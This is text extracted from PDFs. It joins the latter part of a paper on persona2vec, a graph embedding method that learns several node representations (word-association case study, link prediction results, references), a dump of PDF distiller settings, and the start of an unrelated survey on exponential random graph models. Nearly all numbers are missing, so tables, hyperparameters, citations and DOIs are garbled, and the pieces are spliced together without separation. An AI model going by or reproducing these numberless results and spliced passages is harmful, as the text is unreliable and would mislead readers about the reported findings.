scores from the link prediction experiment. blue links represent correctly predicted edges and red edges indicate incorrectly predicted ones. full-size doi: . /peerj-cs. /fig- yoon et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ separated as a result. we also show the ten predictions with the highest scores from the link prediction experiment in fig. d and ensure that the model predicts missing edges well. case study: word association network word association network captures how people associate words together (free association task). the dataset was originally assembled from nearly , responses from over , peoples. participants were shown , words and asked to write down the first word that sprang in mind and all the word pairs were collected with their frequency as the weights. this dataset forms a weighted, directed graph of words that captures their multiple senses. although it is, in principle, possible to run our method on the original graph, for simplicity, we convert it into an undirected, unweighted graph by neglecting weight and direction (ahn, bagrow & lehmann, ). in fig. , we show the persona vec clusters around the word “newton”. we use the louvain method (blondel et al., ) to split the personas of each word. persona vec successfully captures figure the word association network, clusters around the word “newton”. coordinates of the words come from the -d projection of the embedding vectors with umap (mcinnes, healy & melville, ). word colors correspond to the clusters obtained by k-means clustering (macqueen, ) on the embedding vectors. full-size doi: . /peerj-cs. /fig- yoon et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ multiple contexts of the word “newton”. for instance, the red persona is associated with “scientists” and “philosopher”, the gray one is linked to the physics, and the yellow one is associated with “apple” (note that there is a cookie called “(fig) newton” in the u.s.). furthermore, persona vec also captures different nuances of the word “law” that are related to the crime (brown cluster) and the legal concepts (orange cluster). numerical experiment link prediction task to systematically evaluate the performance and scalability of the persona vec framework, we perform a link prediction task using real-world graphs (grover & leskovec, ; abu-el-haija, perozzi & al-rfou, ). link prediction aims to predict missing edges in a graph with partial information, which is useful for many tasks such as suggesting new friends on social networks or recommending products. it has been employed as a primary task to evaluate the performance of unsupervised graph embedding methods (abu-el-haija, perozzi & al-rfou, ; zhang et al., ). we follow the task setup from the literature (grover & leskovec, ; abu-el-haija, perozzi & al-rfou, ). first, the edge set of an input graph is divided equally and randomly into etrain and etest. we then refine etest using a rejection sampling method based on the criterion that, even when we remove all edges in etest, the graph should be connected as a single component. etrain is used to train the models, and edges in etest are used as positive examples for the prediction task. second, a negative edge set e(−) of non-existent random edges with the same size of etest are generated to provide negative examples for testing. the performance of a model is measured by its ability to correctly distinguish etest and e(−) after being trained on etrain. we then report roc-auc. datasets to facilitate the comparison with the state-of-the-art baseline, we use five graph datasets that are publicly available and previously used (epasto & perozzi, ; leskovec & krevl, ). we summarize them as follows. ppi is a protein-protein interaction graph of homo sapiens (stark et al., ). nodes represent proteins and edges represent physical interactions between the proteins. ca-hepth is a scientific collaboration graph. it represents the co-authorship among researchers from the theoretical high energy physics field, derived from papers on arxiv. ca-astropph is also scientific collaboration graph, but from astrophysics. wiki-vote is a voting network, each node is a wikipedia user and a directed edge from node i to node j represents that user i voted for user j to become an administrator. soc-epinions is a voting graph from a general consumer review site epinions.com, each node is a member, and a directed edge from node i to node j means that member i trusted member j. we use the largest connected component of the undirected graphs and the largest weakly connected component of the directed ones. the statistics of all the graphs are reported in table . yoon et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://epinions.com http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ methods the state-of-the-art method in this link prediction task is splitter (epasto & perozzi, ), which also models multiple roles. as reported in the paper, it outperforms various exiting algorithms ranging across non-embedding methods like jaccard coefficient, common neighbors, and adamic-adar as well as embedding methods like laplacian eigenmaps (belkin & niyogi, ), node vec (grover & leskovec, ), dngr (cao, lu & xu, ), asymmetric (abu-el-haija, perozzi & al-rfou, ) and m-nmf (wang et al., ). given the state-of-the-art performance of splitter, for simplicity, we compare our framework with splitter using the identical task setup and datasets. in addition, because our method can be considered as an augmentation of a single-role embedding method, and because we use node vec as the base embedding method, we also employ node vec. we run the link prediction task using the original authors’ implementation of node vec and splitter. the parameters are also kept consistent with the original paper. persona vec and splitter have multiple representations on each node, which leads to non-unique similarity estimations between two nodes. hence, we define the similarity score of a pair of nodes on persona vec as the maximum dot-product of embedding vectors between any pair of their personas. we found that, among experiments with three aggregation functions min, max, mean, the highest performance is achieved with max, the same with splitter (epasto & perozzi, ). for splitter, we use maximum cosine similarity, following the author’s note in their implementation. node vec (baseline method) for node vec, we set random walk length t = , the number of walks per node γ = , random walk parameters p = q = , the window size w = , and the initial learning rate a = . . in the original paper, they learn an additional logistic regression classifier over the hadamard product of the embedding of two nodes for the link prediction. in general, the logistic regression classifier improves the performance. here, we report results on node vec with both dot products and the logistic regression classifier. splitter (baseline method) for splitter, we use the same parameters in the paper (epasto & perozzi, ) and aforementioned node vec baseline. we use node vec with random walk parameters p = q = . persona vec (our proposed method) we set the hyper-parameters of the original graph embedding with tb = , γb = , wb = . for the persona embedding, we set tp = , γp = , wp = to better capture the micro- structure of the persona graph. the size of the total trajectories is determined by the random walk length t� times the number of walks per node γ�, so we keep t�γ� constant to roughly preserve the amount of information used in the embedding. for both embedding stages, we use a = . , and node vec with the random walk parameters (p = q = ) as the graph embedding function. yoon et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ experiment results figure shows the link prediction performance of persona vec in comparison with the baselines. overall, persona vec yields superior performance across graphs and across a range of hyperparameter choices. we show that augmenting node vec by considering personas significantly improves the link prediction performance, evinced by the significant performance gain (see table ). as expected, larger dimensions lead to better performance, although persona vec achieves reasonable results even with tiny embedding dimensions like or . we also show how the performance of persona vec varies with λ. for undirected graphs, larger λ is beneficial but the trend saturates quickly. for directed graphs, however, optimal performance is achieved with smaller values of λ. in practice, we suggest starting with λ = . as a default parameter because the overall variation brought by λ is not substantial and even when the performance increases with λ, near-optimal performance can be achieved at λ = . . when compared with the splitter baseline, persona vec shows on par or better performances given the same embedding dimensions across a wide range of λ. we also a b c d e figure performance of persona vec in the link prediction task. we report the link prediction performance for each graphs for (a) ppi, (b) ca-hepth, (c) ca-astroph, (d) wiki-vote, and (e) soc-epinions. number of epochs n is set to in all experiments for persona vec. darker colors represent higher embedding dimensions. the confidence intervals are all within the range of the markers. given the same number of dimensions, persona vec is always on par with or better than splitter. full-size doi: . /peerj-cs. /fig- table performance of persona vec with λ = . . all methods use d = . node vec* refers to node vec with the logistic regression classifier, splitter* refers to splitter with one epoch, and persona vec* refers persona vec with λ = . , our suggested default. performance gain is perfor- mance difference between persona vec* and node vec. we omit the standard error which is smaller than − . bold numbers represent the best performance. method ppi ca-hepth ca_astroph wiki-vote soc-epinions node vec . . . . . ± . node vec* . ± . . . . ± . . ± . splitter . . . . . ± . splitter* . . . . . ± . persona vec* . . . . . performace_gain . . . . . ± . yoon et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ report the performance summary for persona vec with λ = . (our suggested default) compared with the best baselines in table , which shows that persona vec outperforms the baseline consistently. also, we report the performance gain of persona vec from node vec, because we used node vec as the base embedding method and persona vec can be considered as an augmentation or fine-tuning of the base node vec vectors with local structural information. as shown, the persona-based fine-tuning significantly improves the performance. we also study the effect of different optimization methods, i.e., hierarchical softmax and negative sampling in fig. . we also find that cosine similarity consistently yields a better result with hierarchical softmax while dot product yields a better result with negative sampling regardless of the embedding methods. so, we use cosine similarity for hierarchical softmax and use dot product for negative sampling. our experiments suggest that persona vec tends to perform better with negative sampling while splitter works better with hierarchical softmax. nevertheless, persona vec yields the best performance consistently. in addition to the performance of the link prediction task, we also report the execution time of persona vec and splitter to compare their scalability in practice (see fig. ). note that the reported execution time is from the link-prediction task, with half of the edges removed from the original graph. splitter runs the embedding procedures for epochs by default in the original implementation, whereas persona vec only runs for one epoch. for a fair comparison, we also report the results of splitter with one epoch of training. when being limited to only one epoch, splitter’s performance slightly suffers on three graphs while it goes up or stays stable for the other two. undirected directed a b c d e figure comparison of link prediction performance between persona vec and splitter with different approximations. we report the link prediction performance across optimization methods for each graphs for (a) ppi, (b) ca-hepth, (c) ca-astroph, (d) wiki-vote, and (e) soc- epinions. hs refers to the hierarchical softmax and ns refers to the negative sampling. the star marker indicates the best link prediction perfor- mance. full-size doi: . /peerj-cs. /fig- yoon et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ nevertheless, persona vec is more efficient— to times faster than splitter with epochs and five to eight times faster than splitter with one epoch. the most likely reason behind the drastic difference is the overhead from the extra regularization term in the cost function of splitter, which persona vec does not need. in sum, persona vec outperforms the previous state-of-the-art method both in terms of scalability and link prediction performance. conclusions we present persona vec, a framework for learning multiple node representations considering the node’s local structural contexts. persona vec first performs ego-splitting, where nodes with multiple non-overlapping local communities in their ego-networks are replaced with corresponding persona nodes. the persona nodes inherit the edges from the original graph and remain connected by newly added persona edges, forming the persona graph. initialized by the embedding of the original graph, the embedding algorithm applied to the persona graph yields the final representations. instead of assigning only one vector to every node with multiple roles, persona vec learns a vector for each of the personas. with extensive link prediction evaluations, we demonstrate that persona vec achieves the state-of-the-art performance while being able to scale better. moreover, our method is easy to comprehend and implement without losing any flexibility for incorporating other embedding algorithms, presenting great potential for figure comparison of elapsed time between persona vec and splitter. speed gains by per- sona vec are shown. full-size doi: . /peerj-cs. /fig- yoon et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ applications. the possible combination with various algorithms provides vast space for further exploration. for instance, in a multi-layer network, inter-layer coupling connection can be interpreted as natural persona edges, and persona vec may be applied to tackle the multi-layer link prediction problem. the graph (relational) structure is ubiquitous across many complex systems, including physical, social, economic, biological, neural, and information systems, and thus fundamental graph algorithms have far-reaching impacts across many areas of sciences. graph embedding, in particular, removes the barrier of translating methods to the special graph data structure, opening up a powerful way to transfer existing algorithms to the graphs and relational data. furthermore, given that it is natural to assume that overlapping clusters and their heterogeneous functionality exist in most real networks, multi-role embedding methods may find numerous applications in physical, biological, and social sciences. acknowledgements for their comments, we thank sadamori kojaku, alessandro flammini, filippo menczer, xiaoran yan, filipi nascimento silva, and minwoo ahn. additional information and declarations funding this work is supported by the air force office of scientific research under award number fa - - . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: air force office of scientific research: fa - - . competing interests the authors declare that they have no competing interests. author contributions � jisung yoon conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � kai-cheng yang conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � woo-sung jung conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � yong-yeol ahn conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. yoon et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data availability the following information was supplied regarding data availability: the prepossessed version of ppi is available at stanford university: https://snap. stanford.edu/node vec/. other graphs (ca-astroph, ca-hepth, wiki-vote, soc-epinions ) are also available at the snap library: http://snap.stanford.edu/data/index.html. code is available at github: https://github.com/jisungyoon/persona vec. references abu-el-haija s, perozzi b, al-rfou r. . learning edge representations via low-rank asymmetric projections. in: proceedings of the acm on conference on information and knowledge management, cikm ’ . new york: acm, – . ahn y-y, bagrow jp, lehmann s. . link communities reveal multiscale complexity in networks. nature ( ): – doi . /nature . airoldi em, blei dm, fienberg se, xing ep. . mixed membership stochastic blockmodels. journal of machine learning research (september): – . belkin m, niyogi p. . laplacian eigenmaps and spectral techniques for embedding and clustering. in: proceedings of the th international conference on neural information processing systems: natural and synthetic. cambridge: mit press, – . blondel vd, guillaume j-l, lambiotte r, lefebvre e. . fast unfolding of communities in large networks. journal of statistical mechanics: theory and experiment ( ):p doi . / - / / /p . camacho-collados j, pilehvar mt, navigli r. . nasari: integrating explicit knowledge and corpus statistics for a multilingual representation of concepts and entities. artificial intelligence ( ): – doi . /j.artint. . . . cao s, lu w, xu q. . deep neural networks for learning graph representations. in: proceedings of the thirtieth aaai conference on artificial intelligence. aaai press, – . chen h, perozzi b, hu y, skiena s. . harp: hierarchical representation learning for networks. in: thirty-second aaai conference on artificial intelligence. new orleans: aaai press. chen x, liu z, sun m. . a unified model for word sense representation and disambiguation. in: proceedings of the conference on empirical methods in natural language processing (emnlp). association for computational linguistics, – . cheng j, wang z, wen j-r, yan j, chen z. . contextual text understanding in distributional semantic space. in: proceedings of the th acm international on conference on information and knowledge management. acm, – . coscia m, rossetti g, giannotti f, pedreschi d. . uncovering hierarchical and overlapping communities with a local-first approach. acm transactions on knowledge discovery from data ( ): : – : doi . / . epasto a, lattanzi s, mirrokni v, sebe io, taei a, verma s. . ego-net community mining applied to friend suggestion. proceedings of the vldb endowment ( ): – doi . / . . yoon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://snap.stanford.edu/node vec/ https://snap.stanford.edu/node vec/ http://snap.stanford.edu/data/index.html https://github.com/jisungyoon/persona vec http://dx.doi.org/ . /nature http://dx.doi.org/ . / - / / /p http://dx.doi.org/ . /j.artint. . . http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ epasto a, lattanzi s, paes leme r. . ego-splitting framework: from non-overlapping to overlapping clusters. in: proceedings of the rd acm sigkdd international conference on knowledge discovery and data mining, kdd ’ . new york: acm, – . epasto a, perozzi b. . is a single embedding enough? learning node representations that capture multiple social contexts. in: the world wide web conference. new york: acm, – . evans ts, lambiotte r. . line graphs, link partitions, and overlapping communities. physical review e ( ): doi . /physreve. . . fortunato s. . community detection in graphs. physics reports ( – ): – doi . /j.physrep. . . . gavin a-c, aloy p, grandi p, krause r, boesche m, marzioch m, rau c, jensen lj, bastuck s, dümpelfeld b, edelmann a, heurtier m-a, hoffman v, hoefert c, klein k, hudak m, michon a-m, schelder m, schirle m, remor m, rudi t, hooper s, bauer a, bouwmeester t, casari g, drewes g, neubauer g, rick jm, kuster b, bork p, russell rb, superti-furga g. . proteome survey reveals modularity of the yeast cell machinery. nature ( ): – doi . /nature . grover a, leskovec j. . node vec: scalable feature learning for networks. in: proceedings of the nd acm sigkdd international conference on knowledge discovery and data mining, kdd ’ . new york: acm, – . iacobacci i, pilehvar mt, navigli r. . sensembed: learning sense embeddings for word and relational similarity. in: proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing (volume : long papers). stroudsburg: association for computational linguistics, – . jauhar sk, dyer c, hovy e. . ontologically grounded multi-sense representation learning for semantic vector space models. in: proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies. stroudsburg: association for computational linguistics, – . leskovec j, krevl a. . snap datasets: stanford large network dataset collection. available at http://snap.stanford.edu/data. leskovec j, lang kj, dasgupta a, mahoney mw. . community structure in large networks: natural cluster sizes and the absence of large well-defined clusters. internet mathematics ( ): – doi . / . . . leskovec j, lang kj, mahoney m. . empirical comparison of algorithms for network community detection. in: proceedings of the th international conference on world wide web, www ’ . new york: acm, – . li j, jurafsky d. . do multi-sense embeddings improve natural language understanding? arxiv. available at http://arxiv.org/abs/ . . liu n, tan q, li y, yang h, zhou j, hu x. . is a single vector enough? exploring node polysemy for network embedding. in: proceedings of the th acm sigkdd international conference on knowledge discovery & data mining. new york: association for computing machinery, – . liu p, qiu x, huang x. . learning context-sensitive word embeddings with neural tensor skip-gram model. in: twenty-fourth international joint conference on artificial intelligence. palo alto: aaai press. liu y, liu z, chua t-s, sun m. . topical word embeddings. in: twenty-ninth aaai conference on artificial intelligence, – january , austin texas, usa. yoon et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . /j.physrep. . . http://dx.doi.org/ . /nature http://snap.stanford.edu/data http://dx.doi.org/ . / . . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ maaten lv d, hinton g. . visualizing data using t-sne. journal of machine learning research (november): – . macqueen j. . some methods for classification and analysis of multivariate observations. in: proceedings of the fifth berkeley symposium on mathematical statistics and probability, oakland, ca, usa. vol. . – . mcinnes l, healy j, melville j. . umap: uniform manifold approximation and projection for dimension reduction. available at https://arxiv.org/abs/ . . mikolov t, chen k, corrado g, dean j. a. efficient estimation of word representations in vector space. available at https://arxiv.org/abs/ . . mikolov t, sutskever i, chen k, corrado gs, dean j. b. distributed representations of words and phrases and their compositionality. in: advances in neural information processing systems. – . morin f, bengio y. . hierarchical probabilistic neural network language model. in: artificial intelligence and statistics (aistats’ ). vol. . – . neelakantan a, shankar j, passos a, mccallum a. . efficient non-parametric estimation of multiple embeddings per word in vector space. arxiv. available at https://arxiv.org/abs/ . . palla g, derényi i, farkas i, vicsek t. . uncovering the overlapping community structure of complex networks in nature and society. nature ( ): – doi . /nature . pelevina m, arefyev n, biemann c, panchenko a. . making sense of word embeddings. available at https://arxiv.org/abs/ . . pennington j, socher r, manning c. . glove: global vectors for word representation. in: proceedings of the conference on empirical methods in natural language processing (emnlp). – . perozzi b, al-rfou r, skiena s. . deepwalk: online learning of social representations. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining, kdd ’ . new york: acm, – . raghavan un, albert r, kumara s. . near linear time algorithm to detect community structures in large-scale networks. physical review e ( ): doi . /physreve. . . reisinger j, mooney rj. . multi-prototype vector-space models of word meaning. in: human language technologies: the annual conference of the north american chapter of the association for computational linguistics. association for computational linguistics, – . rossi ra, ahmed nk. . the network data repository with interactive graph analytics and visualization. in: aaai. rosvall m, bergstrom ct. . maps of random walks on complex networks reveal community structure. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . rosvall m, esquivel av, lancichinetti a, west jd, lambiotte r. . memory in network flows and its effects on spreading dynamics and community detection. nature communications ( ): doi . /ncomms . rothe s, schütze h. . autoextend: extending word embeddings to embeddings for synsets and lexemes. arxiv. available at https://arxiv.org/abs/ . . sen p, namata g, bilgic m, getoor l, galligher b, eliassi-rad t. . collective classification in network data. ai magazine ( ): doi . /aimag.v i . . yoon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . /nature https://arxiv.org/abs/ . http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /ncomms https://arxiv.org/abs/ . http://dx.doi.org/ . /aimag.v i . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ stark c, breitkreutz b-j, reguly t, boucher l, breitkreutz a, tyers m. . biogrid: a general repository for interaction datasets. nucleic acids research :d –d . tang j, qu m, wang m, zhang m, yan j, mei q. . line: large-scale information network embedding. in: proceedings of the th international conference on world wide web, www ’ , republic and canton of geneva, switzerland, international world wide web conferences steering committee. – . wang x, cui p, wang j, pei j, zhu w, yang s. . community preserving network embedding. in: thirty-first aaai conference on artificial intelligence. wu z, giles cl. . sense-aaware semantic analysis: a multi-prototype word representation model using wikipedia. in: twenty-ninth aaai conference on artificial intelligence. xie g-s, liu l, zhu f, zhao f, zhang z, yao y, qin j, shao l. . region graph embedding network for zero-shot learning. in: european conference on computer vision. cham: springer, – . yang l, cao x, he d, wang c, wang x, zhang w. . modularity based community detection with deep learning. in: ijcai . new york: aaai press, – . zachary ww. . an information flow model for conflict and fission in small groups. journal of anthropological research ( ): – doi . /jar. . . . zhang h, zhong g. . improving short text classification by learning vector representations of both words and hidden topics. knowledge-based systems ( ): – doi . /j.knosys. . . . zhang z, cui p, wang x, pei j, yao x, zhu w. . arbitrary-order proximity preserved network embedding. in: proceedings of the th acm sigkdd international conference on knowledge discovery & data mining. new york: acm, – . yoon et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /jar. . . http://dx.doi.org/ . /j.knosys. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ persona vec: a flexible multi-role representations learning framework for graphs introduction related work proposed method: persona vec case study numerical experiment conclusions flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice submitted may accepted march published april corresponding author seyed hossein khasteh, khasteh@kntu.ac.ir academic editor yilun shang additional information and declarations can be found on page doi . /peerj-cs. copyright ghafouri and khasteh distributed under creative commons cc-by . open access a survey on exponential random graph models: an application perspective saeid ghafouri and seyed hossein khasteh school of computer engineering, k. n. toosi university of technology, tehran, iran abstract the uncertainty underlying real-world phenomena has attracted attention toward statistical analysis approaches. in this regard, many problems can be modeled as networks. thus, the statistical analysis of networked problems has received special attention from many researchers in recent years. exponential random graph models, known as ergms, are one of the popular statistical methods for analyzing the graphs of networked data. ergm is a generative statistical network model whose ultimate goal is to present a subset of networks with particular characteristics as a statistical distribution. in the context of ergms, these graph’s characteristics are called statistics or configurations. most of the time they are the number of repeated subgraphs across the graphs. some examples include the number of triangles or the number of cycle of an arbitrary length. also, any other census of the graph, as with the edge density, can be considered as one of the graph’s statistics. in this review paper, after explaining the building blocks and classic methods of ergms, we have reviewed their newly presented approaches and research papers. further, we have conducted a comprehensive study on the applications of ergms in many research areas which to the best of our knowledge has not been done before. this review paper can be used as an introduction for scientists from various disciplines whose aim is to use ergms in some networked data in their field of expertise. subjects artificial intelligence, computer networks and communications, data mining and machine learning, network science and online social networks, social computing keywords exponential random graph models survey, exponential random graphs, ergm, ergms’ survey, ergms’ applications introduction networks are an essential part of everyday life. from the world wide web to biological networks, they all shape the connections of the world. there are many examples of the use of networks in various fields and disciplines. examples of them include social networks, traffic systems, and disease spread networks. the most canonical way of representing a network is a graph. indeed, not all of the networks’ ties are presented with % certainty. for example, in a friendship network, the level of friendship is not the same among all individuals or there is always a chance that two friends stop their friendship in the future further, in some domains, the current snapshots of the network depend on its timestamp where the network’s shape might be different if the snapshot has been taken in another time. for example, in a blockchain network, the structure of the network connections is constantly changing. hence, the graph has a dynamic structure over time. how to cite this article ghafouri s, khasteh sh. . a survey on exponential random graph models: an application perspective. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:khasteh@kntu.ac.ir https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. all of these suggest some level of uncertainty in many real-world networks. therefore, simple graph theory will not suffice for examining these networks. these limitations have led to proposing completely new statistical approaches for graph analysis. more specifically, we want to build a statistical model based on the observed dataset. in these types of graph analysis, a probability in the interval of [ , ] is assigned to each graph. if this probability is close to zero, it indicates that the graph has no chance of existence, while one suggests that this particular graph will undoubtedly exist in the generated data. any other value between zero and one indicates the existence probability of that graph. these probabilities have different meanings depending on the domain of the network. however, the probability of graph’s existence is the most fundamental definition, to which we will stick for the rest of the article. statistical graphs (frank, ; robins et al., a; goldenberg et al., ) have attracted scientists from different disciplines. there are different kinds of approaches regarding their formulation and learning methods. people from mathematics, computer science, physics, and of course statistics have proposed different algorithms and methods for designing the framework for statistically modeled graphs. in addition, statistical graphs are also fundamental to generative models for generating new graphs with similar statistics and attributes to the original graphs. these artificial generated models have various applications, e.g., data augmentation for learning systems where we have datasets with limited resources or simulating and predicting other possible graphs with similar properties. furthermore, there are longitudinal (holland & leinhardt, ; koskinen & snijders, ; de la haye et al., ; block et al., ) models which aim to observe a network over a time period and predict the network’s future dynamics. although different approaches exist, in this work, we are going to review research articles about a particular family of statistical graphs known as exponential random graph models, abbreviated as ergm. designing a statistical model consists of three steps: ( ) designing a general formulation based on the context and statistical specification of the dataset; ( ) estimating the parameters of the designed model via some learning methods, where sometimes this step is addressed as the phase of fitting the model to the data; and ( ) employing the model with learned parameters to predict the future or unseen part of the data, generation of new data with similar properties, or any other possible tasks. the model utilized for ergms (step ) is almost similar across the entire literature. however, the parameter estimation step (step ) differs case by case. figure s demonstrates the mentioned steps’ flowchart. the focus of the seminal works such as 